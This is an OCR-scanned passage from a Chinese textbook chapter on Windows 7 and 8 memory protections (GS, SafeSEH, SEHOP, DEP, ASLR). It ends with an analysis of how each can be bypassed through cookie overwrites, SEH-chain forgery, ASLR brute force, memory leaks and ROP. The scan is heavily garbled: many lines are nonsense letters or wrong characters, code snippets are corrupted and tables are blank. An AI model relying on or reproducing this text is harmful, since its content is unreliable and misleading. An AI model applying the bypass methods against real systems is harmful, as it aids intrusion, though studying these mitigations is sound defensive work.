个 第 数 Oxbb40e64e 进行 比较 ,如 末 不 相等 , 束 会 检查 C6 高 地 址 的 2 FE (Byte) En EE., 


如 果 为 0,C6 将 会 进行 左 移 10 比特 预算 , 记 作 C7。C6 或 C7 就 是 最 终生 成 的 cookie 值 , 当 
一 个 cookie 最 终生 成 后 ,C6 被 存储 在 映像 文件 中 ,作为 一 个 全 局 数 _ security_cookie,C7 作 
为 security cookie complement, 

JA Vr A ad Ha PRI NC Rs “BE JH EN) EE ui JE b HJ AE Tec A ZB T HI] ZEE ue EAE [AU p AE fJ AR 
局 , 它 将 字符 串 缓 冲 区 放 在 栈 帧 中 的 高 地 址 ,以 确保 字符 串 洲 出 时 不 会 覆盖 其 他 的 变量 。 同 
时 在 栈 帆 低 地 址 处 申请 额外 的 空间 ,存放 函数 参数 的 备份 ,返回 地 址 之 后 的 原 函 数 参 数 数据 
将 不 会 再 被 使 用 。 使 用 Visual Studio 2005 GS 的 栈 帧 布局 变化 如 图 17-6 所 示 。 


char b[10]; 
u saved EBP saved EBP 
Return Return 
| MES 
um 
Source Code Without GS With Visual Studio2005 GS 
17-6 Visual Studio 2005 GS 楼 帧 结构 布局 变化 


Copy of arg | 
void gs order(char* arg) mEMMEE O P | 
| NONE 
char a[ 100]; 
int i NEN 
— E EMI 
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额外 代码 的 加 入 与 运行 导致 运行 效率 的 下 降 , 在 极 闪 情况 下 效率 降幅 达到 42%, 为 了 
优化 使 用 GS 编 详 选项 的 效率 ,编译 从 只 对 包含 字符 串 和 使 用 _alloca 申请 内 存 的 函数 加 入 
GS cookie, C 编译 天 将 元 系 大 小 为 1 或 2 字 节 且 数 组 大 小 不 小 于 4 EB IE XE TN BS 
型 ,所 以 元 对 大 小 过 大 或 数组 大 小 过 小 的 变量 将 不 受 GS 的 保护 。Visual Studio 2005 SPI 
RAS ZR RS] Se PE ELA T SC AH GS WWE. B strict_gs_check, 如 果 将 并 pragma strict_ 
gs_check(on) 加 入 到 需要 GS 保护 的 模块 中 , 编 详 硕 将 会 在 所 有 使 用 变量 的 图 数 中 加 入 GS 
cookie, 

在 Windows 7 之 前 的 系统 也 有 部 分 GS 功能 , 表 17-1 所 示 为 Windows 7 与 之 前 版 本 系 
统 的 GS 功能 部 着 对 比 情况 。 


表 17-1 Windows 各 版 本 GS 功能 部 署 对 比 


GS Cookie XP SP2.SP3 | 2003 SPl.SP2 | Vista SPO oe 
J Vi 
J 
x 





17.1.2 SafeSEH 及 SEHOP 分 析 


SafeSEH 是 另 一 种 安全 机 制 , 它 可 以 阻止 利用 SEH 的 exploit, SafeSEH 包含 两 种 机 
fll: SEH 句柄 验证 和 SEH 链 验 证 。 

从 Visual Studio 2003 开始 ,增加 了 一 个 编译 选项 SAFESEH ,如 果 局 用 该 编 详 选项 , 编 
译 器 会 在 生成 的 文件 头 部 包含 一 个 异常 处 理 句柄 表 。 当 异常 发 生 时 ,异常 处 理 机 制 会 在 调 
用 异常 处 理 函 数 前 检查 异常 处 理 链 是 否 被 修改 过 ,系统 会 从 头 到 尾 遍历 异常 处 理 链表 ,并 这 
个 验证 它们 的 有 效 性 ,如 图 17-7 所 示 。 


t= SEH AIA | 非法 SEH 侣 柄 


Applehl App!main+0x1c 


在 表 中 未 找到 





17-7  SafeSEH 句柄 验证 工作 机 制图 


SEHOP HB] SEH 链 验 证 ,又 称 Dynamic SafeSEH ,是 SafeSEH 机 制 的 扩展 。 该 机 制 的 
思想 是 建立 于 Matt Miller 的 一 篇 文章 Preventing the Exploitation of SEH Overwrites 基 
础 之 上 的 。SEHOP 作为 Structured Exception Handling 的 扩展 ,用 于 针对 程序 中 使 用 的 
SEH 结构 进行 进一步 的 安全 检测 。SEHOP 的 核心 特性 是 用 于 检测 程序 栈 中 的 所 有 SEH 
结构 链表 ,特别 是 最 后 一 个 SEH 结构 , 它 拥 有 一 个 特殊 的 异 第 处 理 图 效 指针 , 指 癌 一 个 位 
于 ntdll PAPAL. BAR SEH the KE us UA SEH 链 就 会 被 破坏 ,SEH 链 的 末尾 将 不 再 
能 退回 原始 预计 的 跳 转 绪 采 ,其 过 程 如 几 17-8 Brzn 

Windows 各 版 本 的 SafeSEH SD fii OU xT Lb Unde 17-2 所 示 。 
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合法 SEH 链 非法 SEH 链 


| —| App! main-*Oxlc 
0x41414141 
/ 


$ ”不 能 获取 到 合法 由 





17-8 SEHOP 工作 机 制图 


表 17-2 Windows 各 版 本 SafeSEH 部 署 情 况 对 比 


SafeSEH XP SP2.SP3 | 2003 SP1.SP2 Vista SP1 ET 


17.1.3 DEP 机制 分 析 


数据 执行 保护 (Data Executive Protection) 机 制 被 标记 为 non-executable 的 内 存 页 上 数 
据 不 可 执行 ,在 开局 DEP 保护 的 默认 情况 下 ,只 有 文件 的 . text 段 和 加 载 入 内 存 的 dll 文件 
映像 才 可 以 被 执行 。 开 局 DEP 保护 后 , 非 执 行 页 上 的 代码 如 Shellcode 试图 被 执行 时 ,会 发 
生 访 问 寞 第 , 叶 臻 程序 朋 江 无 法 运行 。 如 琳 一 个 程序 必须 执行 堆 或 栈 中 的 代码 时 ,需要 使 用 
VirtualAlloc 或 VirtualProtect 图 数 使 当前 页 可 执行 。 

DEP 有 两 种 模式 ,如 果 CPU 不 支持 ,Windows 只 能 启用 部 分 的 DEP 功能 称 为 软件 支 
持 的 DEP 模式 ,这 种 DEP 不 能 阻止 在 数据 页 上 执行 代码 ,但 可 以 防止 其 他 的 exploit(SEH 

a) » BEKI DEP 就 是 SafeSEH, 和 NX/XD 标志 无 天 。 当 今 大 多 数 CPU(2004 年 之 后 生 
产 的 ) 都 从 硬件 级 别 上 支持 NX 属性 ,将 是 本 小 节 讨 论 的 重点 。 

由 于 大 多 数 的 应 用 软件 存在 DEP 兼容 问题 ,因此 Windows 7 操作 系统 默认 是 不 对 所 
有 应 用 程序 开局 DEP 的 ,管理 员 账 户 可 以 从 4 种 DEP 策略 选项 中 选择 ,分 别 是 OptIn、 
OptOut, AlwaysOn, AlwaysOff, 

OptIn # Windows 7 操作 系统 的 默认 选项 ,在 该 模式 下 只 为 系统 进程 和 应 用 程序 开局 
DEP 保护 ,其 他 程序 则 不 受 保护 。 该 模式 下 的 DEP 保护 可 以 被 应 用 程序 在 运行 时 关闭 ,或 
dA 2 IL — PAS AE E ER I AS B Be PINE EH a at WEA]. Windows 7 所 有 有 目 市 的 应 用 程序 在 编 
译 时 都 加 入 NXcompat 选项 。 如 图 17-9 PRS . IE, .画图 工具 .计算 器 .系统 核 心 进 程 等 都 启 
用 了 DEP 保护 。 

OptOut 选项 开启 时 ,所 有 进程 都 被 开启 DEP 保护 ,除非 管理 员 将 其 添加 到 例外 , 服 
F ax hie fe VE A Bt. UW Windows Server 2003 和 Windows Server 2008 默认 开启 OptOut 
Jc Jit , 

AlwaysOn 选项 : 所 有 进程 都 被 DEP 保护 ,没有 例外 。 无 法 在 运行 时 通过 程序 来 天 
4] DEP, 

AlwaysOff 选项 : 所 有 进程 都 不 开启 DEP 保护 ,也 无 法 在 运行 时 开启 。 

NXCOMPAT 的 实现 ,是 通过 在 Windows PE 文件 头 信息 (PE Header) 中 设置 IMAGE_ 
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映像 名 称 e. d 
calc. exe ; Windows HZ 
firefox. exe í Firefox 

mspdbsrw. exe " Microsoft® Program... 
iexplore. exe i Internet Explorer 


devent. exe : ， Microsoft Visual St... 
tashmgr. exe i Windows [TS EHS 

iexplore. exe : Internet Explorer 

mspaint. exe i 画图 

lexplore. exe i Internet Explorer 

explorer. exe : findows fae ERES 

dwm. exe i 桌面 窗口 管理 器 

taskhost. exe 3 Windows 任务 的 主机 进程 ”启用 


winlogon. exe 











CPU HAE: 16% WEAF: 45% 





图 17-9 Windows 7 系统 中 各 进程 的 数据 保护 情况 


DLLCHARACTERISTICS_NX_COMPAT 这 个 标志 人 位。 参见 MSDN 具体 的 定义 信息 
如 下 。 


typedef struct IMAGE OPTIONAL HEADER { 
WORD Magic; 
BYTE MajorLinkerVersion; 
BYTE MinorLinkerVersion; 


WORD DllCharacteristics; 


] IMAGE OPTIONAL HEADER, 

* PIMAGE OPTIONAL HEADER; 

DllCharacteristics 

The DLL characteristics of the image. The following values are defined. 
IMAGE DLLCHARACTERISTICS NX COMPAT 

0x0100 The image is compatible with data execution prevention (DEP). 


3$ IMAGE DLLCHARACTERISTICS NX COMPAT # ix E AY . b Es IR A REP Yt 


择 当 存在 DEP 文 持 的 情况 下 ,被 DEP 机 制 保 护 。NXCOMPAT 选项 或 是 IMAGE _ 


DLLCHARACTERISTICS_NX_COMPAT 的 设置 ,只 对 Windows Vista SPO 以 上 系统 有 
效 。 在 之 前 版 本 的 系统 上 (如 Windows XP SP2) ,这 个 设置 会 被 忽略 。 也 就 是 说 ,应 用 程序 
并 不 能 目 己 决定 是 否 被 DEP 保护 。 

在 性 能 上 ,由 于 是 CPU 提供 的 硬件 支持 并 触发 异常 ,并 不 会 有 什么 影响 ,更 大 的 考虑 
是 莱 容 性 。 特 别 指出 的 是 ,如 果 用 户 的 程序 使 用 了 ATL 7.1 或 更 早 的 版 本 ,由 于 ATL 会 在 
数据 页 面 上 产生 执行 代码 ,使 用 DEP 保护 运行 时 就 会 出 现 系统 异常 。 

Windows 7 和 之 前 版 本 系统 对 DEP 技术 的 部 普 情 况 对 比如 表 17-3 Ara. 
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表 17-3 Windows 各 版 本 DEP 部 署 情况 对 比 


DEP XP SP2,SP3 | 2003 SP1,.SP2 | Vista SPO Vista SP1 Windows 7 


NX support 


OptIn Mode by default 





17.1.4 ASLR 分 析 


地 址 空间 随机 化 (ASLR ) 使 得 洲 出 不 再 利用 固定 的 程序 位 置 、 结 构 位 置 来 定位 执行 溢 
出 攻击 代码 。 如 经 典 的 栈 、. 扒 溢出 中 可 利用 系统 DLL 中 的 指令 对 程序 流程 进行 控制 ,如 利 
H JMP ESP 等 。 当 其 位 置 不 再 固定 , 跳 转 到 目标 指令 就 变 得 困难 ,使 许多 攻击 代码 不 能 成 
功 执行 。 

Windows XP 及 Windows 2003 系统 只 能 实现 对 PEB, TEB 等 关键 结构 的 随机 化 。 而 
在 Windows 7 下 则 几乎 使 其 应 用 到 所 有 的 结构 .程序 映像 .堆栈 等 。ASLR 默认 开局 ,但 可 
通过 在 注册 表 中 增加 一 个 键 值 将 其 关闭 。 同 样 由 于 兼容 性 问题 ,其 要 判断 PE 3k zx FP REAR 
容 ASLR ,进而 决定 映像 加 载 是 否 随 机 。 

ASLR 加 载 有 以 下 规律 。 

(1) 系统 . dll 文件 在 每 次 运行 后 基 址 都 不 会 改变 。 

(2) 系统 . dll 文件 在 每 次 重启 后 基 址 都 会 发 生 随机 改变 ,不 过 改变 的 范围 不 大 ,只 涉及 
第 3 一 5 个 字 节 随机 改变 。 

(3) 在 同一 次 运行 中 时 ,系统 . dll 文件 在 不 同 的 进程 空间 中 的 基 址 是 相同 的 。 

(4) PEB —— MÀ 动 而 变化 。 

(5) 程序 中 的 段 选择 字 FS:L0j 总 是 指 回 当前 线程 环境 块 (TEB) 的 基 址 ,FS:L0oj 内 容 是 
不 变 的 。 

(6) 栈 基 址 随 着 进程 的 每 次 启动 而 变化 。 

当 程 序 启动 ,将 执行 文件 映 喘 到 内 存 时 ,系统 将 在 原来 映像 基 址 的 基础 上 加 上 一 个 取 日 
RDTSC counter 的 8 位 随机 数 a, 作 为 新 的 映像 基 址 。 为 了 保证 新 的 映像 基 址 与 原来 的 不 
同 ,这 个 随机 数 a 从 不 为 0( 当 a 为 0 时 ,系统 将 其 修改 为 1), 所 以 映像 基 址 将 有 255 种 可 
能 。 但 这 使 1 出 现 的 概率 是 其 他 随机 数 的 两 倍 。 因 此 在 Vista SP1 中 ,微软 改正 了 这 个 问 
题 ,将 随机 数 a 整除 254 并 加 1 使 a 的 取信 范 于 限定 为 1 一 254, 保 证 了 每 个 数值 出 现 的 概 
率 为 1/254. BR AR 3E hb Hh Ab Hy BS OL th Z& TE VJ Tz PR Bt ntoskrnl. exe A x FF PKR 
MiSelectImageBase () 中 完成 的 。 具 体 代 码 如 下 : 


if((nt_header -> Characteristics& IMAGE FILE DLL) == 0) 
{ 
RelocateExe: 
unsigned intDelta = (((RDTSC>> 4) $ OxFE) * 1) * 0x10000; 
dwlImageSize = image size rounded up to 64KB 
dwImageEnd = dwImageBase + dwImageSize; 
if (dwImageBase > = MnHighestUserAddress || 
dwImageSize > MmHighestUserAddress || 
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dwImageEnd < = dwImageBase || 
dwImageEnd > MmHighestUserAddress) 
return 0; 
if (arg0 一 > dwOffsetl4 + Delta == 0) 
return dwlImageBase; 
if (dwImageBase > Delta) { 
dwNewBase = dwImageBase — Delta; 
} 
else{ 
dwNewBase = dwImageBase + Delt 
if (dwNewBase < dwImageBase | dwNewBase + ImageSize > MmHighestUserAddress) || 
dwNewBase + ImageSize 
< dwImageBase + ImageSize) 
return 0; 


return dwNewBase; 


17.2 Windows 8 的 内 存 保护 机 制 


Windows 8 的 内 存 保护 机 制 与 Windows 7 的 内 存 保护 机 制 类 似 , 但 在 GS 机 制 .ASLR 
机 制 和 DEP 机制 上 又 做 了 新 的 改进 。 

1. GS 机 制 改进 

Windows 8 操作 系统 在 GS 检测 方法 上 ,并 没有 做 改变 ,只 是 在 _security_cookie 生成 
方面 ,利用 Intel Security Key 技术 , 即 Ivy Bridge 提供 的 随机 数 生成 带 , 对 应 到 新 的 指令 为 
rdrand 。 

图 17-10 所 示 为 Windows 8 OS 加 载 器 Winload. exe 在 启动 过 程 中 ,调用 RDRAND 


指令 。 


.Lext:BahB6CcaSsE BF C7 F2 rdrand edz 
-text:66046CA91 73 FB jnb short loc_46CA8E 
text :HOGA 89 1h 81 nou [ecx+eax*4], edx 
-text:6646CA96 46 inc eax 

.text: 6646CA97 3D 88 18 868 HÖ cnp eax, 1808h 
-Cext: 6648CA9C 72 FH jb short loc &^BCRSE 


图 17-10 Winload! OslpGatherRdrandEntropy 部 分 指令 


2. ASLR 机 制 改进 

Windows 8 之 前 的 ASLR 有 以 下 两 点 不 足 。 

(1) 随机 化 程度 不 够 ,Windows 7 及 以 前 版 本 ,只 随机 化 地 址 的 前 两 个 字 节 ，。 

(2) 某 些 模块 在 编译 链接 时 ,由 于 某 些 原因 没有 加 入 dynmicbase 选项 ,因此 系统 不 会 
对 其 启用 地 址 随机 化 。 

正 是 由 于 上 面 的 两 点 缺陷 ,出 现 了 各 种 绕 过 Windows 7 地 址 随机 化 的 漏洞 稳定 利用 技 
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术 。 针 对 第 一 点 缺陷 ,现在 最 为 成 熟 的 技术 通过 地 址 潭 露 , 算 出 当前 某 模块 的 基地 址 ,利用 
该 地 址 即 可 完成 后 续 的 漏洞 利用 。Peter Vreugdenhil 在 Pwn2Own 2010 EL ii at Eu 
BSTR 头 部 长 度 ,完成 基 址 泄露 ,成 功 在 Windows 7 IE8 上 执行 代码 。 尽 管 IE9 浏览 器 之 
后 ,引入 JSCRIPT9. DLL ,通过 覆盖 BSTR 结构 不 再 可 行 , 同 时 通过 字符 串 喷射 内 存 的 方法 
也 受到 了 限制 ,但 研究 人 员 很 快 又 发 现 了 其 他 方法 ,如 通过 对 象 属性 嘎 射 内 存 、HTML5 Is 
射 等 。 由 于 随机 化 程度 不 够 ,在 某 些 漏洞 上 下 文中 ,攻击 者 甚至 可 以 枚 举 地 址 ,完成 攻击 过 
程 。 针 对 第 二 点 缺陷 ,攻击 者 可 以 寻找 系统 中 未 局 用 ASLR 的 模块 并 利用 ,轻松 完成 整个 
攻击 过 程 。 这 些 模块 有 jrel. 6. x 版 本 中 的 MSVCR71. DLL, Office 2007 或 Office 2010 中 
的 HXDS. DLL 模块 。HXDS. DLL 的 未 随机 化 问题 ,已 经 被 微软 修补 ,安全 公告 编号 为 
MS13-106, 

由 此 Windows 8 在 随机 化 方面 ,加 入 以 下 两 点 改进 。 

第 一 是 Force ASLR ,即使 模块 没有 加 入 dynmicbase 链接 选项 ,操作 系统 也 对 其 作 随 机 
化 处 理 , 这 样 攻击 者 无 法 利用 未 局 用 随机 化 的 模块 。 如 图 17-11 所 示 ,可 以 看 到 Windows 8 
下 的 IE 进程 ,启用 了 ForceASLR。 





参 iexplore.exe:8256 properties 


Job | | Stinas O 
Image | Performance Security | 
Image File 
> Internet Explorer 
| | Microsoft Corporation 
Version; — 10.0.9200. 16798 
Build Time: SatFeb 01 12:52:49 2014 
Path: 
C:\Program Files (x86)\Internet Explorer Yexplore.exe 
Command line: 
"C:\Program Files (x86) Internet Explorer VEXPLORE.EXE" SCODEF:8208 CREDAT:257521 /prefetch:2 
Current directory: 


C:\Wsers\hello \Desktop\, | 


Autostart Location: 








n/a | Explore 


Parent: iexplore.exe(3203) 

User: helloworld nello 

Started: 11:36:39 2014/3/12 Image: 32-bit Bring to Front. 
comments | | 
wst | 


Data Execution Prevention (DEP) Status: DEP (permanent) 
Address Space Load Randomization: Enabled, Force 











图 17-11 IE10 开启 ForceASLR 


Force ASLR 可 以 有 效 保护 类 似 TE 这 类 软件 。 例 如 ,在 以 前 版 本 的 Windows 中 ,IE 3t 


程 及 相关 DLL 本 号 开局 了 随机 化 ,但 其 中 硅 有 攻 些 第 三 方 插件 没有 局 用 ASLR, 则 TE 进程 
的 ASLR 就 可 以 完全 绕 过 。 
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第 二 ,对 于 x64 系统 ,加 入 了 HeASLRCOHighEntropy ASLR),Windows 充分 利用 64 位 
地 址 空间 ,使 攻击 者 无 法 对 可 能 地 址 进行 预测 。 图 17-12 一 图 17-14 所 示 为 测试 的 Windows 
8 x64 环境 下 ,程序 中 模块 地 址 和 堆栈 地 址 的 情况 ， 


图 17-13 


Kernel32 loaded at 466607FF16146666 
Address of LoadLibrary BBBHBUFF1614355H 
ntdll.dll loaded at BBBBB7FF18R4B8BBB 


Address of function fFoo-BHBHBHBBH/F7716D1BBHH 
Address of stack: B6660600HHGH0HAFFE6H 
Address of heap: G6666806666CE1'726 





图 17-12 Windows 8 x64 系统 进程 各 地 址 情况 


Kernel32 loaded at BBBBBH'7FSFRFA4HBBH 
Address of LoadLibrary BBHBHBB'UFSFRF4355H 
tdll.dll loaded at G6H0H'7FS FBR 76060 


Address of Function foo-HHBHH7F65854H11HHH 
Address of stack: HHHHHHHHHH13FAGH 
Address of heap: 666660866481 726 





Windows 8 x64 系统 再 次 启动 程序 后 进程 各 地 址 情况 


Kernel32 loaded at BHBHHBHH7FRFRF4HBHH 
Address of LoadLibrary HHBHHH7FRFRFE4355H 
tdll.dll loaded at BBHBBHBH7FRFBB7HB8HH 


Address of function foo-BBBHBB7F874611U0BH 
Address of stack: 21212122121 818 SS ER FAGA 
Address of heap:8888BBBBBBRB1'728 





图 17-14 Windows 8 x64 其 他 系统 同一 程序 各 地 址 情况 


图 17-12 和 图 17-13 所 示 为 一 个 系统 重新 启动 前 后 ,同一 个 程序 对 应 进程 中 地 址 对 比 ， 


图 17-14 所 示 为 另 一 个 


系统 的 地 址 效 条 ,可 以 看 到 ,部 分 地 址 位 数 变 化 较 大 。 单 以 


Kernel32. dll 和 Ntdll. dll 模块 的 加 载 地 址 随机 性 看 ,发 现 64 位 的 地 址 中 ,有 19 FRAN 
同 。 而 对 于 Windows 7.64 位 系统 ,并 没有 尽 可 能 多 的 利用 64 位 地 址 空间 。 经 过 多 次 测 
试 ,发 现 随机 性 远大 于 Windows 7 系统 。 表 17-4 所 示 为 Windows 7 及 Windows 8 系统 随 


机 化 对 比 。 


随机 化 位 数 


栈 

PEB/TEB 

EXE 

DLL 

未 开启 ASLR 的 DLL 


表 17-4 Windows 7 和 Windows 8 随机 化 对 比 
eet Windows 8 
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MK 17-4 中 可 以 看 到 ,Windows 8 相 比 于 Windows 7 系统 ,在 随机 化 程度 上 有 了 大 幅 
提升 。 特 别 是 64 位 系统 , 尽 可 能 多 地 利用 大 范围 地 址 空间 。 在 某 些 洗 洞 利用 场景 下 ,攻击 
者 通过 穷人 举 地 址 达到 攻击 效果 的 情景 难以 发 生 。 

3. DEP 机 制 改 进 

DEP 即 数 据 执 行 保 护 (Data Execution Prevention), M Windows XP SP2 开始 ,该 保 
护 措 施 就 锌 引入 了 。 硅 开局 DEP ,系统 将 程序 的 数据 区 所 在 的 内 存 页 标记 为 不 可 执行 ,这 
样 即 可 以 有 效 防 止 栈 或 堆 上 执行 恶意 代码 。 由 于 漏洞 利用 的 关键 一 点 就 是 ,数据 和 指令 的 
转换 , 即 数据 流 进入 程序 内 部 处 理 , 当 漏洞 存在 时 ,这 些 数 据 就 可 以 作为 指令 执行 。 而 程序 
内 部 ,数据 存储 的 地 方 只 有 栈 和 堆 , 因 此 将 这 些 区 域 标记 为 不 可 执行 , 即 可 以 防止 恶意 代码 
轻 匈 地 在 数据 区 执行 。DEP 技术 在 一 定 程度 上 极 大 的 提高 漏洞 利用 的 门槛 和 代价 。 

在 Windows 平台 下 ,DEP 工作 在 4 种 模式 下 : OptIn,OptOut,AlwaysOn,AlwavsOff 。 

(1) OptIn: 该 模式 是 系统 默认 模式 ,只 有 系统 的 组 件 才 启用 DEP 保护 。 但 是 在 Vista 
之 后 的 系统 ,如 果 程 序 在 链接 选项 中 开启 | NXCompact 标志 ,也 会 受 DEP 保护 。 

(2) OptOut: 所 有 程序 默认 开启 DEP, 但 是 如 果 某 些 程序 加 入 了 系统 的 排除 开局 DEP 
列表 , 则 这 些 程序 不 会 启用 DEP 保护 。 

(3) AlwaysOn: 系统 中 的 所 有 程序 都 启用 DEP 保护 。 忽 略 排除 列表 中 的 程序 。 

(4) AlwaysOff: 系统 中 所 有 程序 都 不 司 用 DEP 保护 。 

17-15 所 示 为 Windows 8 系统 下 ,通过 Process Explorer 观察 系统 中 部 分 进程 的 DEP JT 
启 情况 。 系 统 DEP 运行 在 OptIn 模式 下 ,但 可 以 看 到 大 部 分 程序 都 已 经 启用 了 DEP. 


0.36 — 135,196 EK 311,488 E 
< 0.01 3,248 K 852 K 5112 DEF 
5,364 K 25,356 K 3016 DEP 
2,896 K 10, 316 K 3796 DEP 












5.324 K 14,276 K 1192 DEF 
3,616 K 10,520 K 7180 DEP 
0.19  114,072K 141,148 K 8380 DEP 
0.20 65,708 E 79,756 K 812 DEP 





图 17-15 DEP 开启 状态 


对 比 前 几 代 系统 ,在 DEP 方面 ,Windows 8 做 了 一 些 改进 。 由 于 现在 通过 ROP 技术 来 
绕 过 DEP 已 经 相当 成 熟 , 因 此 Windows 8 在 对 抗 ROP 方面 做 了 一 部 分 改进 。 现 在 常用 
的 ,通过 ROP 绕 过 DEP 有 两 个 比较 关键 的 步骤 ,第 一 ,调用 VirtualProtect 或 VirtualAlloc 
一 类 的 函数 ,修改 内 存 属 性 或 分 配 一 段 可 执行 内 存 , 这 段 内 存 用 以 执行 Shellcode。 第 二 ,由 
于 现在 栈 类 漏洞 数量 降低 ,大 部 分 ROP 场合 较 多 的 利用 在 堆 上 ,这 样 ROP Gadget 片段 也 
都 在 堆 上 ,攻击 者 为 了 控制 执行 流程 ,需要 将 ESP 指向 堆 区 。 由 此 , 当 调 用 VirtualAlloc 这 
类 API 时 ,Windows 8 会 检测 当前 的 栈 项 指针 是 否 属于 栈 区 的 范围 。 





If (Esp< Teb -> DeallocationStack || Esp > = Teb - > NtTib. StackBase) 
{ 

DbgkForwardException( … ); 
} 
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上 面 代 码 为 检测 方法 的 伪 码 。 即 当前 的 ESP 指针 和 Teb 中 的 栈 基 址 和 栈 的 最 低地 址 
比较 ,如 果 超 出 这 个 范 于 , 则 会 抛 出 一 个 STATUS STACK BUFFOR OVERRUN 的 异 
解 。 这 种 方法 可 以 缓解 堆 漏 洞 中 的 ROP 利用 ,但 由 于 检测 过 于 简单 ,该 方法 可 以 纸 过 。 


17.3 Windows 7 内 存 保护 机 制 脆弱 性 分 析 


1. GS 保护 机 制 脆弱 性 分 析 

CD RI Hio 06 Wb 3E as SEL 

David Litchfield 在 2003 FÆR f — fai 56 3d HE E WR IP HJ OC HE. David 这 样 描述 : 如 来 
cookie 被 一 个 与 原始 cookie AWE m f. fd R A E Ee CECA HE UR 
RA. ASN Fs MDE C. WRB aju — Ph Oh a CR SEH 的 
jH Et + ee Ab PH 28 d8 ET). FF TE cookie ERE Hil AKA — TRH. KCN RP RE RKAGE 
cookie. fH fX if 4E AT VA BM Yt h CAH SEH 的 exploit). 

用 户 可 以 通过 在 检查 cookie Fill fth Ac 5r BY OK PEIER BY ae PP RP EX zz A EL ui d TU TE 
cookie 被 检查 前 就 被 引用 的 数据 (通过 堆栈 传 给 漏洞 图 数 的 参数 ) 。 

(2) 通过 同时 替换 栈 中 和 . data 节 中 的 cookie KAW. 

通过 符 换 加 载 模块 . data PAY cookie 值 ( 它 是 可 与 的 ,否则 程序 就 无 法 在 运行 中 动态 
更 新 cookie J) Sew EH cookie TRIP ,并 用 相同 的 值 蔡 换 栈 中 的 cookie. WRA AN FEE 
意 地 方 写 入 任意 值 (4 个 字 节 的 任意 写 操 作 ) ,以 类 似 下 边 的 指令 造成 访问 为 例 ,那么 表明 可 
能 是 一 个 任意 4 个 字 市 的 写 操作 。 


mov dword ptr[regl], reg2 


为 了 完成 这 个 任务 ,用户 需 要 能 控制 reg] 和 reg2,regl 应 该 包含 需要 写 入 的 内 存 位 置 ， 
reg2 应 该 包含 想 写 人 这 个 地 址 的 值 。 

(3) 利用 未 被 保护 的 缓冲 区 来 实现 绕 过 ，。 

另外 一 个 利用 的 机 会 是 利用 漏洞 代码 不 包含 字符 串 缓 冲 区 ,如 果 arguments 不 包含 字 
符 串 缓冲 区 或 指针 ,那么 堆栈 中 就 没有 cookie, 这 对 拥有 一 个 整数 数组 或 指针 的 函数 同样 有 
效 。 因 为 事实 上 GS 不 会 保护 这 些 函 数 。 

(4) AIE m E JA RA RIER RER Et. 

24 PRB B] SR EN AR d EE SCA TE ETT ax HE oh Be k AF E F H HP. 
能 导致 GS MEL . 7 mi MT Ae A Me PK RR d FP. RIEA HE EE d8 I8] — P H T E Ji HJ He PR C 
K 3b T VA E FE p] XA He BRUCH V] HH SA AREE] IL 

2. SafeSEH 及 SEHOP 脐 弱 性 分 析 

C1) 利用 加 载 模块 之 外 的 地 址 。 

如 果 程 序 编 译 时 没有 启用 SateSEH ,并 且 至 少 存在 一 个 没 启 用 SafeSEH 的 加 载 模块 
(系统 模块 或 程序 私有 模块 )。 那 么 就 可 以 用 这 些 模块 中 的 pop/pop/ret 指令 或 其 他 等 价 指 
令 地 址 来 绕 过 保护 。 事 实 上 ,建议 寻找 一 个 程 厅 私有 模块 (没有 局 用 safeseh) ,因为 它 可 以 
使 exploit 稳定 地 运行 在 各 种 系统 版 本 中 。 如 果 找 不 到 这 样 的 模块 地 址 也 可 以 使 用 系统 模 
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块 中 的 地 址 , 它 也 可 以 工作 (如 果 没 有 局 用 SafeSEH). 

(2) 伪造 SEH 链 。 

针对 SEHOP 的 方法 是 伪造 SEH 链 , 使 得 伪造 后 的 SEH BER m BE dH [3] validation 
frame. M m it SEHOP 的 检查 。 

3. ASLR 脆弱 性 分 析 

(1) Al) Hd AS INAH DLL 5 EXE 映像 。 

Windows 7 系统 默认 只 随机 加 载 使 用 DynamicBase 连接 的 程序 。 而 众多 的 第 三 方 软件 、 
组 件 都 没 采 用 这 种 连接 。 特 别 是 浏览 硕 中 大 量 第 三 方 组 件 的 存在 ,使 系统 安全 性 大 大 降低 。 

(2) tb at BE mi o 

3E OT Tat Hh CAN SUE dl H A m ET IL A. ot Br ASLR 可 知 , 随 机 加 
载 只 是 地 址 的 部 分 高 位 是 动态 的 ,程序 中 的 相对 地 址 是 不 变 的 。 则 通过 修改 指针 的 低位 可 
得 到 稳定 的 定位 。 但 这 种 攻击 对 漏洞 要 求 也 高 ,通用 性 不 踢 。 

(3) BATH. 

当 盗 出 只 发 生 在 一 个 线程 中 且 不 会 造成 整个 进程 的 朋 尘 时。 此 时 如 条 以 骏 力 猜测 的 方 
法 不 断 笠 试 不 同 的 跳 转 地 址 ， 将 可 能 触发 异常 处 理 例 程 ， 进程 不 会 朋 沉 ,其 至 从 外 部 无 法 获 
得 攻击 的 任何 迹象 。 由 于 系统 DLL 只 对 基 址 的 8 比特 进行 了 随机 化 ,攻击 者 有 1/28 的 概 
率 得 到 正确 地 址 (PEB 基 址 的 随机 化 只 用 到 了 4 比特 )。 

许多 Windows 服务 进程 的 功能 是 对 外 提供 网 络 服务 ,有 日 动 重 局 功能 ,如 果 在 此 类 进 
程 中 存在 溢出 漏洞 ,攻击 者 可 以 通过 服务 接口 不 断 向 服务 进程 发 送 洪 出 字符 串 ,通过 暴力 猜 
测 得 到 正确 的 地 址 。 

一 个 经 典 的 案例 是 “PHP 6.0 Dev str transliterate() Buf fer overflow 一 NX 十 
ASLR Bypass”by Matteo Memelli,http://www. exploit— db. com/exploits/12189/, 

该 案例 通过 桑 力 搜 索 虚 拟 地 址 的 高 四 位 。 


PHP 6.0 DEV Exploit brute VirtualProtect address OxXXXXSSSS 
XXXX - value for bruteforce, SSSS - static offset from base addr 


(4) 内 存 信 息 泄 露 。 

如 结合 信息 泄露 获得 一 些 内 存 信 息 ,特别 是 指针 地 址 ,了 驶 可 算出 许多 信息 ,很 可 能 就 使 
下 一 步 攻击 成 功 。 例 如 ,可 算出 映像 是 否 加 载 , 其 附近 结构 的 地 址 ,如 栈 地 址 、 堆 块 地 址 。 甚 
至 由 于 ASLR 的 局 限 性 ,程序 加 载 地 址 只 在 局 动 时 随机 ,从 而 得 到 一 个 程序 的 加 载 地 址 ,可 
算出 本 次 系统 中 其 他 程序 的 加 载 地 址 ,使 ASLR 形同虚设 。 

4. DEP 脆弱 性 分 析 

(1) ret2libc/ ROP, 

n] DAE PE vp d s — Ez dut A Sean m mp fs. Hx Ex PE TCRS B Hb hb 75 us 3a [n] Ho hE ,这 样 可 
